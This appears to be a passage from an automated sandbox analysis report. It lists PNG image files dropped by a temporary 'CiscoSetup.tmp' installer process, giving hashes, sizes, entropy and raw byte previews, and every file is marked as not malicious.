                                                                                                                                                                                                  SHA1:AF5F88451BA51F5FBAE5D3D603655138EE78D27F
                                                                                                                                                                                                  SHA-256:84EF9A5D991E3B3E68AD6F7B8F2D9F279769DC9D27BBB205C3AB9B2BC1607ACA
                                                                                                                                                                                                  SHA-512:58C4E4CDD9B7D5C660A40467F504137D1779222AF24DAFFABB495DBD476A65940E93EF7E8EE7F9BF69A4C4F560D6BA5FB4EEC4DE81C77E4383A24D7B0110DA85
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR..............w=.....pHYs...........~.....IDATH...R.1....y...U....kx..p.9..>@....' (d..=\..p..$....z...;s.In.}../..m.+..4..7.~...@e]...Wx.....~G.2.x+.6J.<&^..).Y.S....Tv.<....,.+..`....G>..Q!".5.h.l.}.I<...*S....t..>%r.0w{.1.mE .@.K.6.-........./L'S.7.|.j..]Z.w..<.'.Kk...`..0N..L..7_.(...C........8,.9. \.T.......K...\..0..L....:...!..}.$.(QQ.....T...../.)dzT..5..iu.......N./.....r.>}.&h%...x....o..6W...B.(...z.a...0w.....BYf.%.{.$.y.NUt*.@....F.T....ge.:v.m..t..xp....d......o.>.....0....IEND.B`.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13727
                                                                                                                                                                                                  Entropy (8bit):7.982847912604664
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:63aRGz9MobH6FYdTA1tjCtZPXq5Sc5Li2H2E:v29jH6FJ1YnyLii2E
                                                                                                                                                                                                  MD5:2DDF6BB80F9B33B219E448F37ED394C0
                                                                                                                                                                                                  SHA1:BD1D1397D9011D9CF81D1061095CEA39C81AEE56
                                                                                                                                                                                                  SHA-256:8CB70AAF7D9D0C98AF0E6C640A78A2D4CABA2DC3DA8876208AD9A617A6E7A226
                                                                                                                                                                                                  SHA-512:00E86EDC454CF26E50D8AEEDF2CBC031E79F609E280E27FA87381CE6C7F9F6A8611FFC6EB1075BE271F0E864EDAAE89FDB25502BCB34C66412B6504C370154CF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............M.....pHYs...#...#.x.?v.. .IDATx..].t...7h....k..B..S......5Q.O.l..-D.....K....*j.X.T.....T.....66..D,X.B..J..@...}...3.s...{.|k...?3sf.>..oJ..^..-(.BDk..o.<........... =......"......\..{.....q..-(N.T...UZ.y.'p"..=Y.Ip.....K.^.:Q........E.wp..+.$..3..*]...0.J.....)_......*x...\M...1..$:.{B....0..e..]0..Z.Y.]...D'...k...p~....3D_.O,;..O..../5....#h..?./?8..[....7..#.....f.4*?e..}..j|e.......'.....d.N...b./...D...p...h]._S>9D.~..M.M.....M.|.@.-.Rr.$..k6.....2..7..v.L.?.Vb=...tl(...1x.._.....fJ$.C.......go...6.c....m.^.N.L&.....}/.j.})_......[.\...k5.....{EK...."......m...G.:.D...\w.q;.p.*%`.}..g.x.D/.c............HE%".d..?..'...DB.......U...<....k....y..N...8...f=..5. ....qO.[P.GD;.h......y...b..... .TT..}..:....M.l....w.wG.h.3....S........O..M...;.wF.p..xCt..T.I.2y)v.Ip6....`....H..V...mi...?a.F.Z2.(%....S...y.W..A.$.}N..(.....m.I..7e.....dr..=..n.7.-....I........L..5y........->1.".R.x.......n.^...Go.9~.!.-....
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11747
                                                                                                                                                                                                  Entropy (8bit):7.9792800328394184
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:6O6eUrSbvYvQ77S7PmrQJhWxQLVBinCEBWLp41ZvPaiTlShB9R022uRx1ohfiq:67RSbAvQyCED4QLVBiCLLS1hhMv022u6
                                                                                                                                                                                                  MD5:49E51BACF675B9DF74CD84F600645F0F
                                                                                                                                                                                                  SHA1:563FBED61D83375EE51DD85FD7DC71B53D048ADF
                                                                                                                                                                                                  SHA-256:25EA8BC480B6E97548BD3F64ED6128686C06CAFAA772025B24C2F52CE39B137A
                                                                                                                                                                                                  SHA-512:3231ED2D95E3B2DD1AF2956D3FB29EC7D6AC2D8A5FA6CF12DDA967BCA25CBB3D69B393265B38592B8DB62CC93D55903BE827BD5AC5E119DB5D80E2CE54DDA084
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............M.....pHYs...#...#.x.?v.. .IDATx...x......._...*.<Ih.^.....s.......D....[.....H..*..z).J..j}&...P.B..l..NBD| ' ..r.&3..={...9....Kr^3s.^..^{= ..............M...v.{.l._...e~...H>.4}...w.gpq...>...$..C8k3\.....>.9.. x...g......R..u...~.y..i..F....<.i......b..r.4..j.d..Id..7\Q4Z....H..=.5.....7..A.*X_.~-V.n.8..J.X/...jK..ZX.\.00N.(=p...zA...L}.~......fN.{.L2...e........x.s..t.......-.5..{M.i..#3g........; q..!#{....... }....t....1..N.....1.r.....h..or.".q.8...t..'..&yL..9..M.d....k....c.j.DO...]x5V.6#4SX:..R#n..f...S....sg.7..~5q.`....y.....9...d.o.xL".`..r"..&.3F...B!..B.......).U./...?..... .....7mAZQ.j..z..p$.o.v.=.@\.$.Vh...b.........\.y....:.d.5.9.R>.9.y..q"....4@.*.{.Qi.J.[...........W.6G..4BO..E8j..a.t. ...............o..%...w.+Rqb..PFGkt..)..z.c.B..+;+.7L......V......0.....*:.[.@.E. ...W ....Go8..U.<&..G!8A.@.hY...4Ifj...Z8..+.U.'..F.ea..-Y.Q.,.w.......dA$".>F.Z.VP[.h].B.R..NU...:P....z...<....G.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12124
                                                                                                                                                                                                  Entropy (8bit):7.978101118980993
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:6QcIfCBldrUhS+mzFAXOk03y4nRFoVKX22ZSsnVqzY5oarRl75w1/i5IxehvNbim:6QcRBld2S+m5AOTRaI22ZSgVq053t5ww
                                                                                                                                                                                                  MD5:5B846635AC3DA9C8E857C042ED0EA2F6
                                                                                                                                                                                                  SHA1:B439FC64436B74900F453ED2480C8CA547CBCDCC
                                                                                                                                                                                                  SHA-256:9C6135A6176AC9D00E1BD4307A3111BBECD39814DB18212DA1D55916A4EEDB4F
                                                                                                                                                                                                  SHA-512:0A58ED5105CFB87DD3F91675734171989C0A36B572BA2D20706CC831E0DAD9DB37175754E405680B4DEE4D6D958DA63B89413E2B6D2725A84C95932F8D123323
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............M.....pHYs...#...#.x.?v.. .IDATx...|....O..ZY.Z..!XT* ..,.%...n.R...R.,..)....Vy+..[+..DmA.l).&i.Xi!.XwB.....c....o.;...;..<.L2....<.l..{.9..s(.d..#3;....5...}....]#i.On.....F..G,O&}.]..m.l..rN.k.Jm}Me[...n........Lwe:...f.}`.k7]8......D........v.'(....t.E...^.v......n.....HO";.{.l.2...DX.6._.../.'.=.'9.#....9=... .z....-.>p..~..G......:H..=v...SV.....>..K...w....PYI.....G.mx+2;]az...|...>{...............m.j.*..'x.........n......q..T.9.ew........j'...W..D....-......6)....N2k.,z...+......0..z.x.......z.&./..?..;.0;..+....7Zg.w...B.Y*..qD.....9..G.......9~........S...O..._TTT...Qy\[.(..#c.k*......<..]k.^.c.Lv".5H... e...D./N'.E..tJ....TO.L?A......'..n...*/.....).vwA.bgRS..m.....+.m]~P'8.m.......p.t..a.=....Y.I...$..nO..$....~......m.7..........P.$g.......#.a.>c......;...Y...\.|7.]...S.z..C....=..c.f.2{\..g.h8..v@(....4.....e..fj..Q..{.E.'..../j?|.v..]s...R.......:..;.t.8....'.....x5..#...C..djj..U...8...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 67 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1264
                                                                                                                                                                                                  Entropy (8bit):7.787798189239225
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:GblEbksH883ZKHGbOgt1NxI7aY1nigCC2OjKe6Yt3CvPTWngq2i3sTj85:ElEJH8I/NkQgQ+KtY1C3Sngq2VW
                                                                                                                                                                                                  MD5:DB2D5090354734EC085D88810B342866
                                                                                                                                                                                                  SHA1:F727BC14361A4332C73BFB5194CA5FF6EAC37959
                                                                                                                                                                                                  SHA-256:996C1A034CC8B6CA3C511E2C7EE2FED22F31904DB769A1AD8555F1CFD478AA62
                                                                                                                                                                                                  SHA-512:04F9B9B5EABD33E318F6A83A734ECA67C2778745560F44F45C535847BF642B33DB2C6C974CC7A6AAE4C68C67470135B15ABB2A77247BFF3C518EC113FDFD8888
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...C...@.....A^......pHYs...#...#.x.?v....IDATx..\;R.A.m0.3...8.*C...o.@'.D.%N.:."..q..*o,...@........~.Z-.....J.*}fGo..t..h.jB.D]"b.#"zCD..+.D..,.,...X).q.......:.."...}#.Y:X.........!.1":...1w.`9.=p02.$bw..VP....C..M...F..`.\....w /2.$..5.bQ.^.C[.X.t.\.N..8....[XCQ...Q&.<~...'\C..s.j%.d@ ..8..y.0.9#....0-......q...]..1../....).t.<....L.V....@)N..HQ..+B....9W|d.K..^8..W2-!.}...... Z...e..jB.).9S..Uc.PsF...r...n.+.....:2n..".....!l....E.%'.I.......!$.."._....*....H...?.....HD......7F.u.+...Ke.+.S2`.C...M.........2F2.p.q...ZU\$..E.UX....p..4M..f.Pb...2..k..J..,.D....e.E....i..zc@...tX...s.t....>4"CM...47}....p...\..x#.(....96.yd...._.@.6...C7..2.P....QD...3...7z..d`...3..]...+.b.`k..5....I.#K.V.%.F.h6`. f...g.....G..l....~"l..17.{. m.......1S..$z@.....4....5.........ks.E....._....52L.T.....m..`..;.r....&..p-...}.s.l.S....d%.q..[2...a.. ..|..4.1...v.....j.|b..d0\.....{..6.E.*22.S"..JHa.U.\f.. c.m..!t.HH.MS.sU.P&.Y.!_2.^..V..(S..=
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10239
                                                                                                                                                                                                  Entropy (8bit):7.950564187811269
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:uTeKIu+Nxu1/eEefaoIgGSw78i5GJssnezz3Gu5cMrvF6AO:uTeg+NkdeCodGSiV3dcI96AO
                                                                                                                                                                                                  MD5:7DADB01AC22B7AB6F313726AD5977675
                                                                                                                                                                                                  SHA1:274554CDEB3971D3A9250AA0A7597F8B41D17000
                                                                                                                                                                                                  SHA-256:EBBA9313774314E18ABB4F4342B1C0C93DF22DD45146C6E84A08EB39BD419825
                                                                                                                                                                                                  SHA-512:C77FA7F8791A4852DBA2C9402D705E6C4CDB92DAAF71CD5F46EA8AD6EA35E41D4CFF42296C2F08133A82AE1F31DCA05C61B29AC291F85BBE4C7FDF088A4F0866
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx....U.._l.eK.ImJ\.7`vV...R..t..P3.L...N.DZ..R........!8...`..$.dqj..j..-.a.C.....+...WB)S.tc..N.j..xOs.>...|....UT7....s.......c.!.Q_j.!.......rw..5.....E}.q...R..V.N'Na..@...-...y.`......h..)LS.........J!.....V<(Z9...8E:...-.B.'z.?..1.>X../.k.W(Z9C:.y.=.0.s._.K..#...-........_.0..1...P..C.{-R.Z.~>j.O.X..1...@.r.YJ.....Q.._/......7M..o.4|....J&.t.w. .9sV.|..kz^?5.....K.....D......Q.fd..VFIJ. >..;..".$EG'>I...m..=....E...<...?..e..V..S.|1.3s........K@. ^.w...../`..Bf..V......\....f.w.............).'..!G!`...8......r..!)X5..l.....N%.>.T.x.mq..).E$bp\.....>&.E+A*\..Z.?8.E.g.93.....v.T...I...XGW.'j5rL...WBP..@.)l.....=..=......{q...|.Gtv.Vkr..k7s_.C.............i.l....B.#./.*`.....1.(Z1 .jK...tT....._.%.D....W.P.".....z..X.^..7:.z..W..UB...V.."V~..."..!.s/..9.*.G.W.P.j.Z...B...5K..9.\.........}.P...b50T...j.f.U1.....s..}.._.J<^.s...V.d.U..,k VpU..............M..I.u.......%
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2274
                                                                                                                                                                                                  Entropy (8bit):7.88487369762579
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ANENb8K8isarhoHup4l7Hn5MPuvW5LApZJ+WoXY:Bbx3rGHupubC6NpzSXY
                                                                                                                                                                                                  MD5:02AA7BFBC5519A9410E0D27732A6A163
                                                                                                                                                                                                  SHA1:9DDE546C6090CA4BD8BE58F8625A6AE25D440E6E
                                                                                                                                                                                                  SHA-256:B08A8AE17D62E9CF9D6E91E59955AF91E1B126FD82BC1071BDAFEE8AB6818253
                                                                                                                                                                                                  SHA-512:323777E1ABC44F643AD6AE581970D551D6BB94DF485377E91DB411ED8B839C47F8490002DF9756AD340BC19D8676050A620A1008F211B3AC32C39BE37CD35093
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~.....IDATx...LUe....]i...%L.......^....#.J[6...[.Q.....2.0.p...sT...o.c.n..dE[N/E.9..H..k.....{..s.....wc.{.=?..}..}..}.3....jK#.d"......&"......ug.|b......".&.,"J..[.x..&.J$s....]=t..*........TMDU.G.5=._.@&...........c[|V..v...|3..3.......,...`vp0.@.H...e.`V..`]..g.^sN........ o0..-.gQFz........J..+j.*h@&...T@D...k.zwl1Z.t.......r.U.. n5..5p..{..f1r.E.=P"\..6.jM..2Ym.....u.V..=[)&:*."i...^.{.(U.:C.V..uMjo........N.DG..9.......?.4,....)cy*..H5?]..s..5.lm.w:TAR...)M...YV.GK...<.....|.".p.%.....f.u5............Rr..y.}..DL*Sr.".z...w....n..d...8B.@...xmU.4+...J.n............(KQ~...,.L....>..LV..9....[..../.G.T..(..>4(7...xGw........h.....X.....{..V-@B.../..y..1..W.d. nn...&....~...*S`....k...@k{.w.dP-.n....Z.(...=.:...N..#\......-~......0..;...K. .'....;..|J.n.d.t...A_O)d..g r...w-...e........@5.d.v...........e.y-....3\.......H..[.g.roI.=.(B...\.d.....jh..K..S.].......Xf...jC....ol...2
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 22, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):291
                                                                                                                                                                                                  Entropy (8bit):6.344520469543007
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:6v/lhPqJsXTSgECFg9ZA3teRaCCgqMtK+ywsl3DF1bp:6v/7hXeBOgIYawtvyx3/1
                                                                                                                                                                                                  MD5:DA395D5499E3403BC29899F8ED09E0F4
                                                                                                                                                                                                  SHA1:A6806BF5F7B2B0E1DDB705E2DBDF761E704738CD
                                                                                                                                                                                                  SHA-256:E72F87D5171DCD847C6A5994471B97339C4595E0C55591B1641227B56DB02041
                                                                                                                                                                                                  SHA-512:FEF71C2D806F506CD67B3338484C0B100989135012E72B321287C662AD65BD9120B210270D0B023F76FCAFD23237E9EDEDD5987E6B4D3731B9776B2EB338FE18
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR..............}\.....gAMA......a.....pHYs...........~.....tIME........w.e....tEXtComment.Created with GIMPW.......tEXtSoftware.Paint.NET v3.5.100.r....gIDATHKc`...!@........0.a|Rh..r....0E0>)4.}=..t.....0W....x}......a.`|R...dTw..........B.u..-.z...8.C..^...Y.......IEND.B`.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1601
                                                                                                                                                                                                  Entropy (8bit):6.020486157649533
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:HA/6I1hxWwUyl3ZknA9VYVhEfNAG+ojoyMmcI1VYj41jCw1jaPl3VYjJoUHH3yG3:g/6G6GknA9Wg2O0y/c0CKum23CuUHiWV
                                                                                                                                                                                                  MD5:F999F81B91475C98DE33D66E186DF2CA
                                                                                                                                                                                                  SHA1:397B889C5AA95A25FFBD128656BE5D91A71F3275
                                                                                                                                                                                                  SHA-256:F807E26DA3A4BBFBD9552D2D50FB0F5FC28AAC46635470E3F834C2042C05310B
                                                                                                                                                                                                  SHA-512:2A43CB4EFC414F8FAE4EA173FB53CF2819975C76170DCEE4A995B3A74786C167C26DF258E1E589ECD92DECB999683EA38C6C4882CC2E299313C9357080521844
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...,...(.......P.....pHYs................:iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" tiff:Orientation="1" xmp:CreateDate="2018-10-09T14:27:50-04:00" xmp:ModifyDate="2018-10-19T17:58:51-04:00" xmp:MetadataDate="2018-10-19T17:58:51-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:c57f0649-d423-40eb-938e-eeff8347c1a5" xmpMM:DocumentID="xmp.did:c57f0649-d423-40eb-938e-eeff8347c1a5"
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1601
                                                                                                                                                                                                  Entropy (8bit):6.01754566314674
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:g/6G6GknA9Wg2A/c0glTl3clp3glfHiucV:gSuknmWg2A/qlTlslelfHiucV
                                                                                                                                                                                                  MD5:1F1425233D56C7381E8A1B9544656A3F
                                                                                                                                                                                                  SHA1:13DA3D280A4561F9018BFDF2C55396862B42C3BE
                                                                                                                                                                                                  SHA-256:FD348FEFE62E962AD34D03B3639E850AAEDCEAD2585311F8F665EFFF9319A6BA
                                                                                                                                                                                                  SHA-512:ACEC3FD68209F5AF45FC0736ECD9DB2441E69BD0A0DC43C45CEF2529BDC14B4D4A41696C0BED6E11876F066E137D29E270866FE86F3A20FC4CB9F09BA0EFE0AC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...,...(.......P.....pHYs................:iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" tiff:Orientation="1" xmp:CreateDate="2018-10-09T14:27:50-04:00" xmp:ModifyDate="2018-10-19T18:00:07-04:00" xmp:MetadataDate="2018-10-19T18:00:07-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:c52f4fb1-426f-49c5-a2f3-2e915bfa2393" xmpMM:DocumentID="xmp.did:c52f4fb1-426f-49c5-a2f3-2e915bfa2393"
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1577
                                                                                                                                                                                                  Entropy (8bit):5.942243839150427
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:HA/6I1hxWwUyl3ZknA9VYVhEfNA6h+REMmcI1VCnw7Pl3Vv7aHH3yGNbBg:g/6G6GknA9Wg26x/c0eG3tmHiGg
                                                                                                                                                                                                  MD5:8675E6CF868FCE7270D170D83CE58757
                                                                                                                                                                                                  SHA1:B08567ACEF2380521759E4A1C12B1C9FE657ABED
                                                                                                                                                                                                  SHA-256:593A68E8FC7ADF787E5728D044AC71D4A9BEC6E4A6BF15895ABC8C4869F33625
                                                                                                                                                                                                  SHA-512:6480B3304656ECA345326A96FEF93B653B9F40550E5B0D14498B2670BAFB497E78A2517911F8E791E1DEC3C9A3070CB4212DB727FBE3FC648F6100E5EF349B2F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...,...(.......P.....pHYs................:iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" tiff:Orientation="1" xmp:CreateDate="2018-10-09T14:31:46-04:00" xmp:ModifyDate="2018-10-19T17:56:14-04:00" xmp:MetadataDate="2018-10-19T17:56:14-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:1181fb18-be64-4155-ab97-06d5464c99e6" xmpMM:DocumentID="xmp.did:1181fb18-be64-4155-ab97-06d5464c99e6"
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12068
                                                                                                                                                                                                  Entropy (8bit):7.961027992023309
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:ukEiqZZQXKSmwL4v9UIqsQ8Dfn0Mv2RYkTONqT0oHrkbthyZpLpXrCAfrdag8csp:uViqZZQXKSmwL4VXJhsYOTynyZpNmAjE
                                                                                                                                                                                                  MD5:7E7FE0627B08E07FEE4ED11C41A9BA59
                                                                                                                                                                                                  SHA1:E3C6036975AD146D70AE76158EEBD3D8109B0C7F
                                                                                                                                                                                                  SHA-256:019183BF0C9A25E37A7EB74ABB3DC7848C1A729BBDA1F557E26A5322DBAF11E2
                                                                                                                                                                                                  SHA-512:30E68B932388A840F92D45AA97C3B9CC012C28F36DE93D315B107C7223DCBFBF94A54A09492E930642555828FCB3F6CA519F75BE6EA451DFF7B1D2F5B8FA2472
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx...l....q.a_...n`.p.l..].!.X.cmb.T{W/8.6..6......%".T..yO)"...e!..5....[.+.;..y....RX..s..@[.&.6..j...1..sf..93..I.....;.......(F...-5>P....(.`..T|..P...}.D.H....R.L..8.....1...$.....A.X?.sb..;@...h9.wJ.;._.)eM........Ss...........4..o.............P[j.E.~.TE..0.......ro../.PA..SjK..8A.Zs..eE..X.!...<Y..Z.rr\J.}w.....?e......`..X.c. %......p.z4M7.PC........&.6.......".1c..>...^.d..S.9../s..O... ..4.j.]S<.>u..v.d6..1..S.@.N.y..=...;...9v..=...wB..Y...%.D..$..b...6u....wM...#......w..-.g...F!...he.O..r.2.....Qj..{D.\.we}.....D. ...(...$Z...?.U......r3k.o.'R.M........s....W..h.Hm.q).U.Z...}w....;...'v..I...QO.....Q1k:.h%...Ws...UA....!7....w.f].G..X...w..^...VBT$..pQ.,`-Ms.0.H.C.......d .2....\."...."G.=...{:Xgw..Rj...&.(.e..-C..+.(.)......a...n...'.I..@...8b.'.v."..r.BF./.....`...1.$Z.T$.WE.Y5sWes.:......}:./.y.DK..R.j.B.....YQ..X d|a.^.......F.D+.|..(.....KZ....(.,8~...,".y.H=.! ....
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2531
                                                                                                                                                                                                  Entropy (8bit):7.8827223365027725
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:PajMqdGnKe/dujhrZicEFhViZIs2sJ69y+10zTECChhrHxgpj:PaIqcnKeKZHg7by+ezTLUhrR+j
                                                                                                                                                                                                  MD5:2EA165B23D882176DAAD7C368EE24642
                                                                                                                                                                                                  SHA1:A46B746D76A41D4B322552BE4D66E9FAC66D7C19
                                                                                                                                                                                                  SHA-256:5B0F218A1EDB9CE79C15E8278557CCDB8AF44EAD52B4149CBC27DEF6FFE38619
                                                                                                                                                                                                  SHA-512:7C6C1F9FBDB726AF81551CB2CB790B847904E10AB90923A8FA43C34D617FD4A7F4B0A6FC85D327FA140D8C42197213F2A2BBB4643C16A1FC7DF17C1AF1E674FC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~.....IDATx..\ol.E....)....{.*i#.A .lbi..~.E.......M!..E.M..m.......L../=...TJ...4..@9.....O.E...fz.{..3.G5.%....y.y.....=.a..e.D4.....|.C7....3x..w.....NP(ZVHD5DTMD....sg....E.......+..........ImD.:...3...BP(Z....).(.4A..`.....l..AT.....K@..$Y.~..+A..5...H.\4..V/.Z.'.]{..P.."._...'Q..d%.....j.\...."..E..nS..+Q....e0.."*.1o...-....d{."..i.`.....$.......q...i...Q.6.R...V.j..A.h...>h..'.....)?/.@$.q..u.y'.....6-..wv{.Q../..e/..7.y..wl~.^....;6tWHp..TY..JK..........G/...{"..A.....E9...i..~.....Z@.....zs..t.&;.=..M..C....3)7..z.m.|.'.N.{iiP&.9...m=....L.....ar5.O...&e.} S..~j......>....8..=0v. ..f).#....UC...9..Q....}h8I.R.HI..s....F.6.....v..O^.EhSP.,R&!....N.. ....{...s..$L.....I2... ........C.......Dt........2BV).0.#H.[....@..M.jO:....(S/.v.f.A..bo.t....|M..Z.2BVijk..'.$...n...BP.r..<@KB*.R.....A..6..2.d...:..Y5..F..0...b.;.D....p...=..;v.hgK..o.Iu.... ..R.U.....c...9....xi.TW..`.....~...N.".A...
